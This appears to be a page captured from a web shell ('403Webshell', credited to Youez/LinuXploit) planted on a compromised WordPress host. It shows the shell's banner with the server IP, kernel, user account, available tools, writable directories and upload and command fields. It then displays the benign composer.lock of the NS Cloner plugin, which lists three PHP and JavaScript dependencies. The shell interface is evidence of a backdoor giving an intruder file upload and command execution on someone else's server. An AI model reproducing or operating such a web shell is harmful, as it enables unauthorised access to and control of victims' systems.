403Webshell
Server IP : 146.59.209.152  /  Your IP : 216.73.216.46
Web Server : Apache
System : Linux webm005.cluster131.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User : infrafs ( 43850)
PHP Version : 8.2.29
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/infrafs/www/wp-content/plugins/ns-cloner-site-copier/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/infrafs/www/wp-content/plugins/ns-cloner-site-copier/composer.lock
{
    "_readme": [
        "This file locks the dependencies of your project to a known state",
        "Read more about it at https://getcomposer.org/doc/01-basic-usage.md#installing-dependencies",
        "This file is @generated automatically"
    ],
    "content-hash": "e54f90dca6effa5eda8d79a5b8e53c43",
    "packages": [
        {
            "name": "a5hleyrich/wp-background-processing",
            "version": "1.0.2",
            "source": {
                "type": "git",
                "url": "https://github.com/deliciousbrains/wp-background-processing.git",
                "reference": "2cbee1abd1b49e1133cd8f611df4d4fc5a8b9800"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/deliciousbrains/wp-background-processing/zipball/2cbee1abd1b49e1133cd8f611df4d4fc5a8b9800",
                "reference": "2cbee1abd1b49e1133cd8f611df4d4fc5a8b9800",
                "shasum": ""
            },
            "require": {
                "php": ">=5.2"
            },
            "suggest": {
                "coenjacobs/mozart": "Easily wrap this library with your own prefix, to prevent collisions when multiple plugins use this library"
            },
            "type": "library",
            "autoload": {
                "classmap": [
                    "classes/"
                ]
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "GPL-2.0-or-later"
            ],
            "authors": [
                {
                    "name": "Delicious Brains",
                    "email": "nom@deliciousbrains.com"
                }
            ],
            "description": "WP Background Processing can be used to fire off non-blocking asynchronous requests or as a background processing tool, allowing you to queue tasks.",
            "time": "2020-07-31T07:00:11+00:00"
        },
        {
            "name": "harvesthq/chosen",
            "version": "v1.8.7",
            "source": {
                "type": "git",
                "url": "https://github.com/harvesthq/chosen-package.git",
                "reference": "ad86732b668627c131e61ee8f0e6e9ed52e4db8d"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/harvesthq/chosen-package/zipball/ad86732b668627c131e61ee8f0e6e9ed52e4db8d",
                "reference": "ad86732b668627c131e61ee8f0e6e9ed52e4db8d",
                "shasum": ""
            },
            "type": "library",
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "MIT"
            ],
            "authors": [
                {
                    "name": "Koen Punt",
                    "homepage": "https://github.com/koenpunt"
                },
                {
                    "name": "Patrick Filler",
                    "homepage": "https://github.com/pfiller"
                },
                {
                    "name": "Christophe Coevoet",
                    "homepage": "https://github.com/stof"
                },
                {
                    "name": "Ken Earley",
                    "homepage": "https://github.com/kenearley"
                }
            ],
            "description": "Chosen is a JavaScript plugin that makes select boxes user-friendly. It is currently available in both jQuery and Prototype flavors.",
            "homepage": "https://harvesthq.github.io/chosen/",
            "keywords": [
                "dropdown",
                "form",
                "input",
                "multiselect",
                "select",
                "ui"
            ],
            "time": "2018-06-28T20:32:51+00:00"
        },
        {
            "name": "kint-php/kint",
            "version": "4.0-alpha1",
            "source": {
                "type": "git",
                "url": "https://github.com/kint-php/kint.git",
                "reference": "5dea34eb550f0dd1ef582f3b785158c13f9c4fd4"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/kint-php/kint/zipball/5dea34eb550f0dd1ef582f3b785158c13f9c4fd4",
                "reference": "5dea34eb550f0dd1ef582f3b785158c13f9c4fd4",
                "shasum": ""
            },
            "require": {
                "php": ">=5.6"
            },
            "require-dev": {
                "friendsofphp/php-cs-fixer": "^2.0",
                "phpspec/prophecy-phpunit": "^2",
                "phpunit/phpunit": "^9.0",
                "seld/phar-utils": "^1.0",
                "symfony/finder": "^3.0 || ^4.0 || ^5.0",
                "vimeo/psalm": "dev-master"
            },
            "suggest": {
                "ext-ctype": "Simple data type tests",
                "ext-iconv": "Provides fallback detection for ambiguous legacy string encodings such as the Windows and ISO 8859 code pages",
                "ext-mbstring": "Provides string encoding detection",
                "kint-php/kint-js": "Provides a simplified dump to console.log()",
                "kint-php/kint-twig": "Provides d() and s() functions in twig templates",
                "symfony/polyfill-ctype": "Replacement for ext-ctype if missing",
                "symfony/polyfill-iconv": "Replacement for ext-iconv if missing",
                "symfony/polyfill-mbstring": "Replacement for ext-mbstring if missing"
            },
            "type": "library",
            "autoload": {
                "files": [
                    "init.php"
                ],
                "psr-4": {
                    "Kint\\": "src/"
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "MIT"
            ],
            "authors": [
                {
                    "name": "Jonathan Vollebregt",
                    "homepage": "https://github.com/jnvsor"
                },
                {
                    "name": "Rokas Šleinius",
                    "homepage": "https://github.com/raveren"
                },
                {
                    "name": "Contributors",
                    "homepage": "https://github.com/kint-php/kint/graphs/contributors"
                }
            ],
            "description": "Kint - debugging tool for PHP developers",
            "homepage": "https://kint-php.github.io/kint/",
            "keywords": [
                "debug",
                "kint",
                "php"
            ],
            "time": "2020-11-25T20:18:13+00:00"
        }
    ],
    "packages-dev": [],
    "aliases": [],
    "minimum-stability": "dev",
    "stability-flags": [],
    "prefer-stable": true,
    "prefer-lowest": false,
    "platform": [],
    "platform-dev": [],
    "plugin-api-version": "1.1.0"
}

Youez - 2016 - github.com/yon3zu
LinuXploit